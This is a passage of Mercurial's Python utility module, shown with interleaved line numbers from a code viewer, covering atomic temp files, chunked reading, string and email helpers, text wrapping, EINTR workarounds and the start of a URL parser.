1976 Case (*2) above means that a file was changed twice or more at
1985 same time in sec (= S[n-1].ctime), and comparison of timestamp
1977 same time in sec (= S[n-1].ctime), and comparison of timestamp
1986 is ambiguous.
1978 is ambiguous.
1987
1979
1988 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1980 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1989 timestamp is ambiguous".
1981 timestamp is ambiguous".
1990
1982
1991 But advancing mtime only in case (*2) doesn't work as
1983 But advancing mtime only in case (*2) doesn't work as
1992 expected, because naturally advanced S[n].mtime in case (*1)
1984 expected, because naturally advanced S[n].mtime in case (*1)
1993 might be equal to manually advanced S[n-1 or earlier].mtime.
1985 might be equal to manually advanced S[n-1 or earlier].mtime.
1994
1986
1995 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1987 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1996 treated as ambiguous regardless of mtime, to avoid overlooking
1988 treated as ambiguous regardless of mtime, to avoid overlooking
1997 by confliction between such mtime.
1989 by confliction between such mtime.
1998
1990
1999 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1991 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2000 S[n].mtime", even if size of a file isn't changed.
1992 S[n].mtime", even if size of a file isn't changed.
2001 """
1993 """
2002 try:
1994 try:
2003 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
1995 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2004 except AttributeError:
1996 except AttributeError:
2005 return False
1997 return False
2006
1998
2007 def avoidambig(self, path, old):
1999 def avoidambig(self, path, old):
2008 """Change file stat of specified path to avoid ambiguity
2000 """Change file stat of specified path to avoid ambiguity
2009
2001
2010 'old' should be previous filestat of 'path'.
2002 'old' should be previous filestat of 'path'.
2011
2003
2012 This skips avoiding ambiguity, if a process doesn't have
2004 This skips avoiding ambiguity, if a process doesn't have
2013 appropriate privileges for 'path'. This returns False in this
2005 appropriate privileges for 'path'. This returns False in this
2014 case.
2006 case.
2015
2007
2016 Otherwise, this returns True, as "ambiguity is avoided".
2008 Otherwise, this returns True, as "ambiguity is avoided".
2017 """
2009 """
2018 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2010 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2019 try:
2011 try:
2020 os.utime(path, (advanced, advanced))
2012 os.utime(path, (advanced, advanced))
2021 except OSError as inst:
2013 except OSError as inst:
2022 if inst.errno == errno.EPERM:
2014 if inst.errno == errno.EPERM:
2023 # utime() on the file created by another user causes EPERM,
2015 # utime() on the file created by another user causes EPERM,
2024 # if a process doesn't have appropriate privileges
2016 # if a process doesn't have appropriate privileges
2025 return False
2017 return False
2026 raise
2018 raise
2027 return True
2019 return True
2028
2020
2029 def __ne__(self, other):
2021 def __ne__(self, other):
2030 return not self == other
2022 return not self == other
2031
2023
2032 class atomictempfile(object):
2024 class atomictempfile(object):
2033 '''writable file object that atomically updates a file
2025 '''writable file object that atomically updates a file
2034
2026
2035 All writes will go to a temporary copy of the original file. Call
2027 All writes will go to a temporary copy of the original file. Call
2036 close() when you are done writing, and atomictempfile will rename
2028 close() when you are done writing, and atomictempfile will rename
2037 the temporary copy to the original name, making the changes
2029 the temporary copy to the original name, making the changes
2038 visible. If the object is destroyed without being closed, all your
2030 visible. If the object is destroyed without being closed, all your
2039 writes are discarded.
2031 writes are discarded.
2040
2032
2041 checkambig argument of constructor is used with filestat, and is
2033 checkambig argument of constructor is used with filestat, and is
2042 useful only if target file is guarded by any lock (e.g. repo.lock
2034 useful only if target file is guarded by any lock (e.g. repo.lock
2043 or repo.wlock).
2035 or repo.wlock).
2044 '''
2036 '''
2045 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2037 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2046 self.__name = name # permanent name
2038 self.__name = name # permanent name
2047 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2039 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2048 createmode=createmode)
2040 createmode=createmode)
2049 self._fp = posixfile(self._tempname, mode)
2041 self._fp = posixfile(self._tempname, mode)
2050 self._checkambig = checkambig
2042 self._checkambig = checkambig
2051
2043
2052 # delegated methods
2044 # delegated methods
2053 self.read = self._fp.read
2045 self.read = self._fp.read
2054 self.write = self._fp.write
2046 self.write = self._fp.write
2055 self.seek = self._fp.seek
2047 self.seek = self._fp.seek
2056 self.tell = self._fp.tell
2048 self.tell = self._fp.tell
2057 self.fileno = self._fp.fileno
2049 self.fileno = self._fp.fileno
2058
2050
2059 def close(self):
2051 def close(self):
2060 if not self._fp.closed:
2052 if not self._fp.closed:
2061 self._fp.close()
2053 self._fp.close()
2062 filename = localpath(self.__name)
2054 filename = localpath(self.__name)
2063 oldstat = self._checkambig and filestat.frompath(filename)
2055 oldstat = self._checkambig and filestat.frompath(filename)
2064 if oldstat and oldstat.stat:
2056 if oldstat and oldstat.stat:
2065 rename(self._tempname, filename)
2057 rename(self._tempname, filename)
2066 newstat = filestat.frompath(filename)
2058 newstat = filestat.frompath(filename)
2067 if newstat.isambig(oldstat):
2059 if newstat.isambig(oldstat):
2068 # stat of changed file is ambiguous to original one
2060 # stat of changed file is ambiguous to original one
2069 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2061 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2070 os.utime(filename, (advanced, advanced))
2062 os.utime(filename, (advanced, advanced))
2071 else:
2063 else:
2072 rename(self._tempname, filename)
2064 rename(self._tempname, filename)
2073
2065
2074 def discard(self):
2066 def discard(self):
2075 if not self._fp.closed:
2067 if not self._fp.closed:
2076 try:
2068 try:
2077 os.unlink(self._tempname)
2069 os.unlink(self._tempname)
2078 except OSError:
2070 except OSError:
2079 pass
2071 pass
2080 self._fp.close()
2072 self._fp.close()
2081
2073
2082 def __del__(self):
2074 def __del__(self):
2083 if safehasattr(self, '_fp'): # constructor actually did something
2075 if safehasattr(self, '_fp'): # constructor actually did something
2084 self.discard()
2076 self.discard()
2085
2077
2086 def __enter__(self):
2078 def __enter__(self):
2087 return self
2079 return self
2088
2080
2089 def __exit__(self, exctype, excvalue, traceback):
2081 def __exit__(self, exctype, excvalue, traceback):
2090 if exctype is not None:
2082 if exctype is not None:
2091 self.discard()
2083 self.discard()
2092 else:
2084 else:
2093 self.close()
2085 self.close()
2094
2086
2095 def unlinkpath(f, ignoremissing=False):
2087 def unlinkpath(f, ignoremissing=False):
2096 """unlink and remove the directory if it is empty"""
2088 """unlink and remove the directory if it is empty"""
2097 if ignoremissing:
2089 if ignoremissing:
2098 tryunlink(f)
2090 tryunlink(f)
2099 else:
2091 else:
2100 unlink(f)
2092 unlink(f)
2101 # try removing directories that might now be empty
2093 # try removing directories that might now be empty
2102 try:
2094 try:
2103 removedirs(os.path.dirname(f))
2095 removedirs(os.path.dirname(f))
2104 except OSError:
2096 except OSError:
2105 pass
2097 pass
2106
2098
2107 def tryunlink(f):
2099 def tryunlink(f):
2108 """Attempt to remove a file, ignoring ENOENT errors."""
2100 """Attempt to remove a file, ignoring ENOENT errors."""
2109 try:
2101 try:
2110 unlink(f)
2102 unlink(f)
2111 except OSError as e:
2103 except OSError as e:
2112 if e.errno != errno.ENOENT:
2104 if e.errno != errno.ENOENT:
2113 raise
2105 raise
2114
2106
2115 def makedirs(name, mode=None, notindexed=False):
2107 def makedirs(name, mode=None, notindexed=False):
2116 """recursive directory creation with parent mode inheritance
2108 """recursive directory creation with parent mode inheritance
2117
2109
2118 Newly created directories are marked as "not to be indexed by
2110 Newly created directories are marked as "not to be indexed by
2119 the content indexing service", if ``notindexed`` is specified
2111 the content indexing service", if ``notindexed`` is specified
2120 for "write" mode access.
2112 for "write" mode access.
2121 """
2113 """
2122 try:
2114 try:
2123 makedir(name, notindexed)
2115 makedir(name, notindexed)
2124 except OSError as err:
2116 except OSError as err:
2125 if err.errno == errno.EEXIST:
2117 if err.errno == errno.EEXIST:
2126 return
2118 return
2127 if err.errno != errno.ENOENT or not name:
2119 if err.errno != errno.ENOENT or not name:
2128 raise
2120 raise
2129 parent = os.path.dirname(os.path.abspath(name))
2121 parent = os.path.dirname(os.path.abspath(name))
2130 if parent == name:
2122 if parent == name:
2131 raise
2123 raise
2132 makedirs(parent, mode, notindexed)
2124 makedirs(parent, mode, notindexed)
2133 try:
2125 try:
2134 makedir(name, notindexed)
2126 makedir(name, notindexed)
2135 except OSError as err:
2127 except OSError as err:
2136 # Catch EEXIST to handle races
2128 # Catch EEXIST to handle races
2137 if err.errno == errno.EEXIST:
2129 if err.errno == errno.EEXIST:
2138 return
2130 return
2139 raise
2131 raise
2140 if mode is not None:
2132 if mode is not None:
2141 os.chmod(name, mode)
2133 os.chmod(name, mode)
2142
2134
2143 def readfile(path):
2135 def readfile(path):
2144 with open(path, 'rb') as fp:
2136 with open(path, 'rb') as fp:
2145 return fp.read()
2137 return fp.read()
2146
2138
2147 def writefile(path, text):
2139 def writefile(path, text):
2148 with open(path, 'wb') as fp:
2140 with open(path, 'wb') as fp:
2149 fp.write(text)
2141 fp.write(text)
2150
2142
2151 def appendfile(path, text):
2143 def appendfile(path, text):
2152 with open(path, 'ab') as fp:
2144 with open(path, 'ab') as fp:
2153 fp.write(text)
2145 fp.write(text)
2154
2146
2155 class chunkbuffer(object):
2147 class chunkbuffer(object):
2156 """Allow arbitrary sized chunks of data to be efficiently read from an
2148 """Allow arbitrary sized chunks of data to be efficiently read from an
2157 iterator over chunks of arbitrary size."""
2149 iterator over chunks of arbitrary size."""
2158
2150
2159 def __init__(self, in_iter):
2151 def __init__(self, in_iter):
2160 """in_iter is the iterator that's iterating over the input chunks."""
2152 """in_iter is the iterator that's iterating over the input chunks."""
2161 def splitbig(chunks):
2153 def splitbig(chunks):
2162 for chunk in chunks:
2154 for chunk in chunks:
2163 if len(chunk) > 2**20:
2155 if len(chunk) > 2**20:
2164 pos = 0
2156 pos = 0
2165 while pos < len(chunk):
2157 while pos < len(chunk):
2166 end = pos + 2 ** 18
2158 end = pos + 2 ** 18
2167 yield chunk[pos:end]
2159 yield chunk[pos:end]
2168 pos = end
2160 pos = end
2169 else:
2161 else:
2170 yield chunk
2162 yield chunk
2171 self.iter = splitbig(in_iter)
2163 self.iter = splitbig(in_iter)
2172 self._queue = collections.deque()
2164 self._queue = collections.deque()
2173 self._chunkoffset = 0
2165 self._chunkoffset = 0
2174
2166
def read(self, l=None):
    """Read l bytes of data from the iterator of chunks of data.

    Returns less than l bytes if the iterator runs dry.

    If the size parameter is omitted, read everything.
    """
    if l is None:
        # NOTE: drains only the underlying iterator; anything already
        # buffered in self._queue is not returned by this path.
        return ''.join(self.iter)

    remaining = l
    pieces = []
    queue = self._queue
    while remaining > 0:
        # Refill the queue with roughly 256KB of data when it is empty.
        if not queue:
            target = 2**18
            for chunk in self.iter:
                queue.append(chunk)
                target -= len(chunk)
                if target <= 0:
                    break
            if not queue:
                # Iterator is exhausted; return what we have.
                break

        # The obvious approach would be queue.popleft(), slice the chunk,
        # then queue.appendleft() the remainder. That costs two deque
        # mutations plus a new string for the leftover on every partial
        # read, so instead we peek at the head and track an offset.
        chunk = queue[0]
        chunklen = len(chunk)
        offset = self._chunkoffset

        # Fast path: consume the whole head chunk without slicing.
        if offset == 0 and remaining >= chunklen:
            remaining -= chunklen
            queue.popleft()
            pieces.append(chunk)
            # self._chunkoffset remains at 0.
            continue

        unconsumed = chunklen - offset

        # Consume everything left in the head chunk.
        if remaining >= unconsumed:
            remaining -= unconsumed
            queue.popleft()
            # offset == 0 was handled above, so this never degenerates
            # into a full copy via ``chunk[0:]``.
            pieces.append(chunk[offset:])
            self._chunkoffset = 0

        # Only part of the head chunk is needed.
        else:
            pieces.append(chunk[offset:offset + remaining])
            self._chunkoffset += remaining
            remaining -= unconsumed

    return ''.join(pieces)
2234
2226
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        # A zero-byte request short-circuits to a falsy value and ends
        # the loop without touching the file.
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s
2255
2247
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh        # wrapped file object
        self._left = limit   # bytes still allowed to be read

    def read(self, n=-1):
        """Read up to n bytes, never exceeding the remaining cap."""
        if not self._left:
            return b''

        # A negative n means "read everything still allowed".
        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data
2284
2276
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        try:
            flags = 0 if casesensitive else remod.I
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search
    elif pattern.startswith('literal:'):
        pattern = pattern[8:]

    # default: literal comparison (optionally case-folded)
    match = pattern.__eq__

    if not casesensitive:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2343
2335
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # drop the domain part of an email address
    at = user.find('@')
    if at >= 0:
        user = user[:at]
    # keep only what follows an opening angle bracket
    lt = user.find('<')
    if lt >= 0:
        user = user[lt + 1:]
    # truncate at the first space or dot
    for sep in (' ', '.'):
        idx = user.find(sep)
        if idx >= 0:
            user = user[:idx]
    return user
2359
2351
def emailuser(user):
    """Return the user portion of an email address."""
    at = user.find('@')
    if at >= 0:
        user = user[:at]
    lt = user.find('<')
    if lt >= 0:
        user = user[lt + 1:]
    return user
2369
2361
def email(author):
    '''get email of author.'''
    # slice between '<' and '>'; with neither present this degrades to
    # returning the whole string (find('<') + 1 == 0, end is None)
    end = author.find('>')
    if end == -1:
        end = None
    return author[author.find('<') + 1:end]
2376
2368
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    # delegate to the encoding-aware trimmer so multi-column (East Asian)
    # characters are counted by display width, not byte length
    return encoding.trim(text, maxlength, ellipsis='...')
2380
2372
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        # pick the first (largest) unit whose threshold the count reaches
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        # nothing matched: fall back to the smallest unit
        return unittable[-1][2] % count

    return go
2391
2383
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    # callers get a half-open, 0-based (start, stop) pair
    return fromline - 1, toline
2412
2404
# Render a byte count with a human-readable unit; most specific
# (largest) unit first, falling through to plain bytes.
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2425
2417
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    """Normalize every line ending in s to a bare LF."""
    return _eolre.sub('\n', s)

def tocrlf(s):
    """Normalize every line ending in s to CRLF."""
    return _eolre.sub('\r\n', s)
2436
2428
# Pick EOL converters matching the host platform's native line ending.
if pycompat.oslinesep == '\r\n':
    # Windows: native is CRLF
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    # POSIX: native is already LF, so both directions are no-ops
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
2443
2435
def escapestr(s):
    """Backslash-escape a byte string (like s.encode('string_escape')).

    Calls the underlying codec function directly for Python 3
    compatibility, since the 'string_escape' codec name is Python 2 only.
    """
    return codecs.escape_encode(s)[0]

def unescapestr(s):
    """Inverse of escapestr(): decode backslash escapes in a byte string."""
    return codecs.escape_decode(s)[0]
2451
2443
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string: re-encode through the local encoding,
        # which may be lossy
        return pycompat.bytestr(encoding.strtolocal(str(obj)))
2460
2452
def uirepr(s):
    """Return a byte repr() of s suitable for user-facing output."""
    # Avoid double backslash in Windows path repr()
    return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2464
2456
# delay import of textwrap
def MBTextWrapper(**kwargs):
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # split ucstr so the first part fits in space_left columns
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    # memoize the class so the subclass is only built once
    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2568
2560
def wrap(line, width, initindent='', hangindent=''):
    """Wrap a byte-string line to width display columns, honoring an
    initial and a hanging indent, and re-encode the result."""
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    # decode everything once with the configured encoding/error mode
    enc = pycompat.sysstr(encoding.encoding)
    encmode = pycompat.sysstr(encoding.encodingmode)
    line = line.decode(enc, encmode)
    initindent = initindent.decode(enc, encmode)
    hangindent = hangindent.decode(enc, encmode)
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(enc)
2584
2576
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2656
2648
def iterlines(iterator):
    """Yield the individual lines contained in an iterator of chunks."""
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line
2661
2653
def expandpath(path):
    """Expand environment variables, then ~user constructs, in path."""
    return os.path.expanduser(os.path.expandvars(path))
2664
2656
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if not mainfrozen():
        return gethgcmd()
    if getattr(sys, 'frozen', None) == 'macosx_app':
        # Env variable set by py2app
        return [encoding.environ['EXECUTABLEPATH']]
    return [pycompat.sysexecutable]
2679
2671
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    reaped = set()
    def _onchild(signum, frame):
        reaped.add(os.wait())
    oldhandler = None
    sigchld = getattr(signal, 'SIGCHLD', None)
    if sigchld is not None:
        oldhandler = signal.signal(sigchld, _onchild)
    try:
        pid = spawndetached(args)
        while not condfn():
            # only re-check condfn() when the child looks gone, to avoid
            # racing between its exit and the condition becoming true
            if ((pid in reaped or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        if oldhandler is not None:
            signal.signal(signal.SIGCHLD, oldhandler)
2714
2706
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda text: text)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        # a doubled prefix escapes itself, so map the bare prefix char
        # to itself and accept it as a pattern alternative
        patterns += '|' + prefix
        prefix_char = prefix[1:] if len(prefix) > 1 else prefix
        mapping[prefix_char] = prefix_char
    matcher = remod.compile(br'%s(%s)' % (prefix, patterns))
    # the match includes the (one-character) prefix; strip it for lookup
    return matcher.sub(lambda m: fn(mapping[m.group()[1:]]), s)
2739
2731
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # not a plain number; fall through to a service-name lookup
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise Abort(_("no port number associated with service '%s'") % port)
2756
2748
# Recognized spellings of boolean configuration values.
_booleans = {
    # truthy
    '1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
    # falsy
    '0': False, 'no': False, 'false': False, 'off': False, 'never': False,
}

def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    return _booleans.get(s.lower())
2767
2759
# Map every two-hex-digit string (both cases) to the character it encodes,
# e.g. 'ff' -> '\xff'; used for fast percent-decoding style lookups.
_hextochr = {a + b: chr(int(a + b, 16))
             for a in string.hexdigits for b in string.hexdigits}
2770
2762
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
